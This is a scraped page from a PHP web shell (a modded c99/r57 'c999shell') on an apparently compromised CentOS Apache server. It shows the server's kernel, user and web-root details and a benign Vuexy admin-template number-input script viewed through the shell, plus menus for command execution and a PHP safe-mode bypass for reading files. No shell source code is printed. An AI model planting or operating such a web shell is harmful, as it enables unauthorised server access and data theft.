Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/report/person/app-assets/js/scripts/forms/ drwxr-xr-x |
Viewing file: number-input.js (2.3 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | /*========================================================================================= File Name: input-groups.js Description: Input Groups js ---------------------------------------------------------------------------------------- Item Name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template Author: PIXINVENT Author URL: http://www.themeforest.net/user/pixinvent ==========================================================================================*/ (function (window, document, $) { 'use strict'; var $html = $('html'); // Default Spin $(".touchspin").TouchSpin({ buttondown_class: "btn btn-primary", buttonup_class: "btn btn-primary", }); // Icon Change $(".touchspin-icon").TouchSpin({ buttondown_txt: '<i class="feather icon-chevron-down"></i>', buttonup_txt: '<i class="feather icon-chevron-up"></i>' }); // Min - Max var touchspinValue = $(".touchspin-min-max"), counterMin = 15, counterMax = 21; if (touchspinValue.length > 0) { touchspinValue.TouchSpin({ min: counterMin, max: counterMax }).on('touchspin.on.startdownspin', function () { var $this = $(this); $('.bootstrap-touchspin-up').removeClass("disabled-max-min"); if ($this.val() == counterMin) { $(this).siblings().find('.bootstrap-touchspin-down').addClass("disabled-max-min"); } }).on('touchspin.on.startupspin', function () { var $this = $(this); $('.bootstrap-touchspin-down').removeClass("disabled-max-min"); if ($this.val() == counterMax) { $(this).siblings().find('.bootstrap-touchspin-up').addClass("disabled-max-min"); } }); } // Step $(".touchspin-step").TouchSpin({ step: 5 }); // Color Options $(".touchspin-color").each(function (index) { var down = "btn btn-primary", up = "btn btn-primary", $this = $(this); if ($this.data('bts-button-down-class')) { down = $this.data('bts-button-down-class'); } if ($this.data('bts-button-up-class')) { up = $this.data('bts-button-up-class'); } $this.TouchSpin({ mousewheel: false, buttondown_class: down, buttonup_class: up, buttondown_txt: '<i class="feather icon-minus"></i>', buttonup_txt: '<i class="feather icon-plus"></i>' }); }); })(window, document, jQuery); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0112 ]-- |